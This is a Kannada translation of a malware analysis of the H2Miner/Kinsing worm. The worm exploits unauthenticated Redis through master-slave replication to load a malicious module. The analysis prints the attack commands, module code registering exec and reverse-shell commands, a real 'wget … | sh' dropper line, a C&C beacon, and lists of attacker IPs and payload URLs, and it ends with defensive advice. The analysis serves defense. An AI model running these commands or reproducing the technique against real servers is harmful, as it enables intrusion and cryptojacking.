ಒಂದು ದಿನದ ಹಿಂದೆ, ನನ್ನ ಪ್ರಾಜೆಕ್ಟ್ನ ಸರ್ವರ್ಗಳಲ್ಲಿ ಒಂದನ್ನು ಇದೇ ರೀತಿಯ ವರ್ಮ್ ದಾಳಿ ಮಾಡಿದೆ. "ಅದು ಏನು?" ಎಂಬ ಪ್ರಶ್ನೆಗೆ ಉತ್ತರದ ಹುಡುಕಾಟದಲ್ಲಿ ನಾನು ಅಲಿಬಾಬಾ ಕ್ಲೌಡ್ ಸೆಕ್ಯುರಿಟಿ ತಂಡದಿಂದ ಉತ್ತಮ ಲೇಖನವನ್ನು ಕಂಡುಕೊಂಡಿದ್ದೇನೆ. ಹಬ್ರೆಯಲ್ಲಿ ನಾನು ಈ ಲೇಖನವನ್ನು ಕಂಡುಹಿಡಿಯಲಿಲ್ಲವಾದ್ದರಿಂದ, ನಾನು ಅದನ್ನು ವಿಶೇಷವಾಗಿ ನಿಮಗಾಗಿ ಭಾಷಾಂತರಿಸಲು ನಿರ್ಧರಿಸಿದೆ <3
ಪ್ರವೇಶ
ಇತ್ತೀಚೆಗೆ, ಅಲಿಬಾಬಾ ಕ್ಲೌಡ್ನ ಭದ್ರತಾ ತಂಡವು H2Miner ಹಠಾತ್ ಏಕಾಏಕಿ ಕಂಡುಹಿಡಿದಿದೆ. ಈ ರೀತಿಯ ದುರುದ್ದೇಶಪೂರಿತ ವರ್ಮ್ ನಿಮ್ಮ ಸಿಸ್ಟಮ್ಗಳಿಗೆ ಗೇಟ್ವೇಗಳಾಗಿ Redis ಗಾಗಿ ದೃಢೀಕರಣದ ಕೊರತೆ ಅಥವಾ ದುರ್ಬಲ ಪಾಸ್ವರ್ಡ್ಗಳನ್ನು ಬಳಸುತ್ತದೆ, ಅದರ ನಂತರ ಅದು ತನ್ನದೇ ಆದ ದುರುದ್ದೇಶಪೂರಿತ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಸ್ಲೇವ್ನೊಂದಿಗೆ ಮಾಸ್ಟರ್-ಸ್ಲೇವ್ ಸಿಂಕ್ರೊನೈಸೇಶನ್ ಮೂಲಕ ಸಿಂಕ್ರೊನೈಸ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಅಂತಿಮವಾಗಿ ಈ ದುರುದ್ದೇಶಪೂರಿತ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ದಾಳಿಗೊಳಗಾದ ಯಂತ್ರಕ್ಕೆ ಡೌನ್ಲೋಡ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ದುರುದ್ದೇಶಪೂರಿತವಾಗಿ ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ ಸೂಚನೆಗಳು.
ಹಿಂದೆ, ದಾಳಿಕೋರರು Redis ಗೆ ಲಾಗ್ ಇನ್ ಮಾಡಿದ ನಂತರ ನಿಮ್ಮ ಯಂತ್ರಕ್ಕೆ ಬರೆಯಲಾದ ನಿಗದಿತ ಕಾರ್ಯಗಳು ಅಥವಾ SSH ಕೀಗಳನ್ನು ಒಳಗೊಂಡ ವಿಧಾನವನ್ನು ಬಳಸಿಕೊಂಡು ನಿಮ್ಮ ಸಿಸ್ಟಂಗಳ ಮೇಲಿನ ದಾಳಿಗಳನ್ನು ಪ್ರಾಥಮಿಕವಾಗಿ ನಡೆಸಲಾಗುತ್ತಿತ್ತು. ಅದೃಷ್ಟವಶಾತ್, ಅನುಮತಿ ನಿಯಂತ್ರಣದ ಸಮಸ್ಯೆಗಳಿಂದಾಗಿ ಅಥವಾ ವಿಭಿನ್ನ ಸಿಸ್ಟಮ್ ಆವೃತ್ತಿಗಳಿಂದಾಗಿ ಈ ವಿಧಾನವನ್ನು ಹೆಚ್ಚಾಗಿ ಬಳಸಲಾಗುವುದಿಲ್ಲ. ಆದಾಗ್ಯೂ, ದುರುದ್ದೇಶಪೂರಿತ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಲೋಡ್ ಮಾಡುವ ಈ ವಿಧಾನವು ಆಕ್ರಮಣಕಾರರ ಆಜ್ಞೆಗಳನ್ನು ನೇರವಾಗಿ ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು ಅಥವಾ ನಿಮ್ಮ ಸಿಸ್ಟಮ್ಗೆ ಅಪಾಯಕಾರಿಯಾದ ಶೆಲ್ಗೆ ಪ್ರವೇಶವನ್ನು ಪಡೆಯಬಹುದು.
ಇಂಟರ್ನೆಟ್ನಲ್ಲಿ ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯ ರೆಡಿಸ್ ಸರ್ವರ್ಗಳನ್ನು ಹೋಸ್ಟ್ ಮಾಡಿರುವುದರಿಂದ (ಸುಮಾರು 1 ಮಿಲಿಯನ್), ಅಲಿಬಾಬಾ ಕ್ಲೌಡ್ನ ಭದ್ರತಾ ತಂಡವು ಸ್ನೇಹಪರ ಜ್ಞಾಪನೆಯಾಗಿ, ಬಳಕೆದಾರರು ರೆಡಿಸ್ ಅನ್ನು ಆನ್ಲೈನ್ನಲ್ಲಿ ಹಂಚಿಕೊಳ್ಳಬೇಡಿ ಮತ್ತು ನಿಯಮಿತವಾಗಿ ತಮ್ಮ ಪಾಸ್ವರ್ಡ್ಗಳ ಬಲವನ್ನು ಮತ್ತು ಅವುಗಳು ರಾಜಿಯಾಗುತ್ತಿವೆಯೇ ಎಂದು ಪರಿಶೀಲಿಸುವಂತೆ ಶಿಫಾರಸು ಮಾಡುತ್ತದೆ. ತ್ವರಿತ ಆಯ್ಕೆ.
H2Miner
H2Miner ಲಿನಕ್ಸ್-ಆಧಾರಿತ ಸಿಸ್ಟಂಗಳಿಗೆ ಗಣಿಗಾರಿಕೆ ಬೋಟ್ನೆಟ್ ಆಗಿದ್ದು ಅದು ನಿಮ್ಮ ಸಿಸ್ಟಮ್ ಅನ್ನು ವಿವಿಧ ರೀತಿಯಲ್ಲಿ ಆಕ್ರಮಿಸಬಹುದು, ಹಡೂಪ್ ನೂಲು, ಡಾಕರ್ ಮತ್ತು ರೆಡಿಸ್ ರಿಮೋಟ್ ಕಮಾಂಡ್ ಎಕ್ಸಿಕ್ಯೂಶನ್ (ಆರ್ಸಿಇ) ದುರ್ಬಲತೆಗಳಲ್ಲಿ ದೃಢೀಕರಣದ ಕೊರತೆ ಸೇರಿದಂತೆ. ನಿಮ್ಮ ಡೇಟಾವನ್ನು ಗಣಿಗಾರಿಕೆ ಮಾಡಲು ದುರುದ್ದೇಶಪೂರಿತ ಸ್ಕ್ರಿಪ್ಟ್ಗಳು ಮತ್ತು ಮಾಲ್ವೇರ್ ಅನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡುವ ಮೂಲಕ ಬೋಟ್ನೆಟ್ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ, ದಾಳಿಯನ್ನು ಅಡ್ಡಲಾಗಿ ವಿಸ್ತರಿಸುತ್ತದೆ ಮತ್ತು ಕಮಾಂಡ್ ಮತ್ತು ಕಂಟ್ರೋಲ್ (ಸಿ&ಸಿ) ಸಂವಹನಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ.
ರೆಡಿಸ್ ಆರ್ಸಿಇ
ZeroNights 2018 ರಲ್ಲಿ ಪಾವೆಲ್ ಟೊಪೊರ್ಕೊವ್ ಅವರು ಈ ವಿಷಯದ ಕುರಿತು ಜ್ಞಾನವನ್ನು ಹಂಚಿಕೊಂಡಿದ್ದಾರೆ. ಆವೃತ್ತಿ 4.0 ರ ನಂತರ, Redis ಪ್ಲಗ್-ಇನ್ ಲೋಡಿಂಗ್ ವೈಶಿಷ್ಟ್ಯವನ್ನು ಬೆಂಬಲಿಸುತ್ತದೆ, ಅದು ಬಳಕೆದಾರರಿಗೆ ಲೋಡ್ ಮಾಡುವ ಸಾಮರ್ಥ್ಯವನ್ನು ನೀಡುತ್ತದೆ, ಆದ್ದರಿಂದ ನಿರ್ದಿಷ್ಟ Redis ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು C ನೊಂದಿಗೆ ಸಂಕಲಿಸಿದ ಫೈಲ್ಗಳನ್ನು ರೆಡಿಸ್ಗೆ ಲೋಡ್ ಮಾಡುವ ಸಾಮರ್ಥ್ಯವನ್ನು ನೀಡುತ್ತದೆ. ಈ ಕಾರ್ಯವು ಉಪಯುಕ್ತವಾಗಿದ್ದರೂ ಸಹ, ಮಾಸ್ಟರ್-ಸ್ಲೇವ್ ಮೋಡ್ನಲ್ಲಿ, ಫೈಲ್ಗಳನ್ನು ಫುಲ್ರೆಸಿಂಕ್ ಮೋಡ್ ಮೂಲಕ ಸ್ಲೇವ್ನೊಂದಿಗೆ ಸಿಂಕ್ರೊನೈಸ್ ಮಾಡಬಹುದಾದ ದುರ್ಬಲತೆಯನ್ನು ಒಳಗೊಂಡಿದೆ. ದುರುದ್ದೇಶಪೂರಿತ ಫೈಲ್ಗಳನ್ನು ವರ್ಗಾಯಿಸಲು ಆಕ್ರಮಣಕಾರರಿಂದ ಇದನ್ನು ಬಳಸಬಹುದು. ವರ್ಗಾವಣೆ ಪೂರ್ಣಗೊಂಡ ನಂತರ, ದಾಳಿಕೋರರು ಮಾಡ್ಯೂಲ್ ಅನ್ನು ದಾಳಿಗೊಳಗಾದ ರೆಡಿಸ್ ನಿದರ್ಶನಕ್ಕೆ ಲೋಡ್ ಮಾಡುತ್ತಾರೆ ಮತ್ತು ಯಾವುದೇ ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತಾರೆ.
ಮಾಲ್ವೇರ್ ವರ್ಮ್ ವಿಶ್ಲೇಷಣೆ
ಇತ್ತೀಚೆಗೆ, ಅಲಿಬಾಬಾ ಕ್ಲೌಡ್ ಭದ್ರತಾ ತಂಡವು H2Miner ದುರುದ್ದೇಶಪೂರಿತ ಮೈನರ್ ಗುಂಪಿನ ಗಾತ್ರವು ಇದ್ದಕ್ಕಿದ್ದಂತೆ ನಾಟಕೀಯವಾಗಿ ಹೆಚ್ಚಾಗಿದೆ ಎಂದು ಕಂಡುಹಿಡಿದಿದೆ. ವಿಶ್ಲೇಷಣೆಯ ಪ್ರಕಾರ, ದಾಳಿಯ ಸಾಮಾನ್ಯ ಪ್ರಕ್ರಿಯೆಯು ಈ ಕೆಳಗಿನಂತಿರುತ್ತದೆ:
H2Miner ಪೂರ್ಣ ಪ್ರಮಾಣದ ದಾಳಿಗಾಗಿ RCE Redis ಅನ್ನು ಬಳಸುತ್ತದೆ. ಆಕ್ರಮಣಕಾರರು ಮೊದಲು ದುರ್ಬಲ ಪಾಸ್ವರ್ಡ್ಗಳೊಂದಿಗೆ ಅಸುರಕ್ಷಿತ ರೆಡಿಸ್ ಸರ್ವರ್ಗಳು ಅಥವಾ ಸರ್ವರ್ಗಳ ಮೇಲೆ ದಾಳಿ ಮಾಡುತ್ತಾರೆ.
ನಂತರ ಅವರು ಆಜ್ಞೆಯನ್ನು ಬಳಸುತ್ತಾರೆ config set dbfilename red2.so ಫೈಲ್ ಹೆಸರನ್ನು ಬದಲಾಯಿಸಲು. ಇದರ ನಂತರ, ದಾಳಿಕೋರರು ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತಾರೆ slaveof ಮಾಸ್ಟರ್-ಸ್ಲೇವ್ ರೆಪ್ಲಿಕೇಶನ್ ಹೋಸ್ಟ್ ವಿಳಾಸವನ್ನು ಹೊಂದಿಸಲು.
ದಾಳಿಗೊಳಗಾದ ರೆಡಿಸ್ ನಿದರ್ಶನವು ಆಕ್ರಮಣಕಾರರ ಮಾಲೀಕತ್ವದ ದುರುದ್ದೇಶಪೂರಿತ ರೆಡಿಸ್ನೊಂದಿಗೆ ಮಾಸ್ಟರ್-ಸ್ಲೇವ್ ಸಂಪರ್ಕವನ್ನು ಸ್ಥಾಪಿಸಿದಾಗ, ಆಕ್ರಮಣಕಾರರು ಫೈಲ್ಗಳನ್ನು ಸಿಂಕ್ರೊನೈಸ್ ಮಾಡಲು ಫುಲ್ರೆಸಿಂಕ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಸೋಂಕಿತ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಕಳುಹಿಸುತ್ತಾರೆ. ನಂತರ red2.so ಫೈಲ್ ಅನ್ನು ದಾಳಿಗೊಳಗಾದ ಯಂತ್ರಕ್ಕೆ ಡೌನ್ಲೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ. ದಾಳಿಕೋರರು ಈ ಸೋ ಫೈಲ್ ಅನ್ನು ಲೋಡ್ ಮಾಡಲು ./red2.so ಲೋಡಿಂಗ್ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಬಳಸುತ್ತಾರೆ. ಮಾಡ್ಯೂಲ್ ಆಕ್ರಮಣಕಾರರಿಂದ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಬಹುದು ಅಥವಾ ದಾಳಿಗೊಳಗಾದ ಯಂತ್ರಕ್ಕೆ ಪ್ರವೇಶವನ್ನು ಪಡೆಯಲು ಹಿಮ್ಮುಖ ಸಂಪರ್ಕವನ್ನು (ಹಿಂಬಾಗಿಲು) ಪ್ರಾರಂಭಿಸಬಹುದು.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
ದುರುದ್ದೇಶಪೂರಿತ ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿದ ನಂತರ / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ಆಕ್ರಮಣಕಾರರು ಬ್ಯಾಕಪ್ ಫೈಲ್ ಹೆಸರನ್ನು ಮರುಹೊಂದಿಸುತ್ತಾರೆ ಮತ್ತು ಕುರುಹುಗಳನ್ನು ಸ್ವಚ್ಛಗೊಳಿಸಲು ಸಿಸ್ಟಮ್ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಅನ್ಲೋಡ್ ಮಾಡುತ್ತಾರೆ. ಆದಾಗ್ಯೂ, red2.so ಫೈಲ್ ಇನ್ನೂ ದಾಳಿಗೊಳಗಾದ ಯಂತ್ರದಲ್ಲಿ ಉಳಿಯುತ್ತದೆ. ಬಳಕೆದಾರರು ತಮ್ಮ ರೆಡಿಸ್ ನಿದರ್ಶನದ ಫೋಲ್ಡರ್ನಲ್ಲಿ ಅಂತಹ ಅನುಮಾನಾಸ್ಪದ ಫೈಲ್ ಇರುವಿಕೆಯ ಬಗ್ಗೆ ಗಮನ ಹರಿಸಲು ಸಲಹೆ ನೀಡಲಾಗುತ್ತದೆ.
ಸಂಪನ್ಮೂಲಗಳನ್ನು ಕದಿಯಲು ಕೆಲವು ದುರುದ್ದೇಶಪೂರಿತ ಪ್ರಕ್ರಿಯೆಗಳನ್ನು ಕೊಲ್ಲುವುದರ ಜೊತೆಗೆ, ಆಕ್ರಮಣಕಾರರು ದುರುದ್ದೇಶಪೂರಿತ ಬೈನರಿ ಫೈಲ್ಗಳನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡುವ ಮೂಲಕ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಮೂಲಕ ದುರುದ್ದೇಶಪೂರಿತ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಅನುಸರಿಸಿದರು . ಇದರರ್ಥ ಹೋಸ್ಟ್ನಲ್ಲಿ ಕಿನ್ಸಿಂಗ್ ಹೊಂದಿರುವ ಪ್ರಕ್ರಿಯೆಯ ಹೆಸರು ಅಥವಾ ಡೈರೆಕ್ಟರಿ ಹೆಸರು ಆ ಯಂತ್ರವು ಈ ವೈರಸ್ನಿಂದ ಸೋಂಕಿಗೆ ಒಳಗಾಗಿದೆ ಎಂದು ಸೂಚಿಸುತ್ತದೆ.
ರಿವರ್ಸ್ ಎಂಜಿನಿಯರಿಂಗ್ ಫಲಿತಾಂಶಗಳ ಪ್ರಕಾರ, ಮಾಲ್ವೇರ್ ಮುಖ್ಯವಾಗಿ ಈ ಕೆಳಗಿನ ಕಾರ್ಯಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ:
- ಫೈಲ್ಗಳನ್ನು ಅಪ್ಲೋಡ್ ಮಾಡುವುದು ಮತ್ತು ಅವುಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವುದು
- ಗಣಿಗಾರಿಕೆ
- C&C ಸಂವಹನವನ್ನು ನಿರ್ವಹಿಸುವುದು ಮತ್ತು ಆಕ್ರಮಣಕಾರರ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವುದು
ನಿಮ್ಮ ಪ್ರಭಾವವನ್ನು ವಿಸ್ತರಿಸಲು ಬಾಹ್ಯ ಸ್ಕ್ಯಾನಿಂಗ್ಗಾಗಿ ಮಾಸ್ಕಾನ್ ಬಳಸಿ. ಹೆಚ್ಚುವರಿಯಾಗಿ, C&C ಸರ್ವರ್ನ IP ವಿಳಾಸವನ್ನು ಪ್ರೋಗ್ರಾಂನಲ್ಲಿ ಹಾರ್ಡ್-ಕೋಡ್ ಮಾಡಲಾಗಿದೆ, ಮತ್ತು ದಾಳಿಗೊಳಗಾದ ಹೋಸ್ಟ್ HTTP ವಿನಂತಿಗಳನ್ನು ಬಳಸಿಕೊಂಡು C&C ಸಂವಹನ ಸರ್ವರ್ನೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸುತ್ತದೆ, ಅಲ್ಲಿ HTTP ಹೆಡರ್ನಲ್ಲಿ ಜೊಂಬಿ (ರಾಜಿಯಾದ ಸರ್ವರ್) ಮಾಹಿತಿಯನ್ನು ಗುರುತಿಸಲಾಗುತ್ತದೆ.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
ಇತರ ದಾಳಿ ವಿಧಾನಗಳು
ವರ್ಮ್ ಬಳಸುವ ವಿಳಾಸಗಳು ಮತ್ತು ಲಿಂಕ್ಗಳು
/ ಕಿನ್ಸಿಂಗ್
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
ಸಲಹೆ
ಮೊದಲನೆಯದಾಗಿ, ರೆಡಿಸ್ ಅನ್ನು ಇಂಟರ್ನೆಟ್ನಿಂದ ಪ್ರವೇಶಿಸಬಾರದು ಮತ್ತು ಬಲವಾದ ಪಾಸ್ವರ್ಡ್ನೊಂದಿಗೆ ರಕ್ಷಿಸಬೇಕು. ರೆಡಿಸ್ ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ ಯಾವುದೇ red2.so ಫೈಲ್ ಇಲ್ಲ ಮತ್ತು ಹೋಸ್ಟ್ನಲ್ಲಿ ಫೈಲ್/ಪ್ರಕ್ರಿಯೆಯ ಹೆಸರಿನಲ್ಲಿ ಯಾವುದೇ "ಕಿನ್ಸಿಂಗ್" ಇಲ್ಲ ಎಂದು ಕ್ಲೈಂಟ್ಗಳು ಪರಿಶೀಲಿಸುವುದು ಸಹ ಮುಖ್ಯವಾಗಿದೆ.
ಮೂಲ: www.habr.com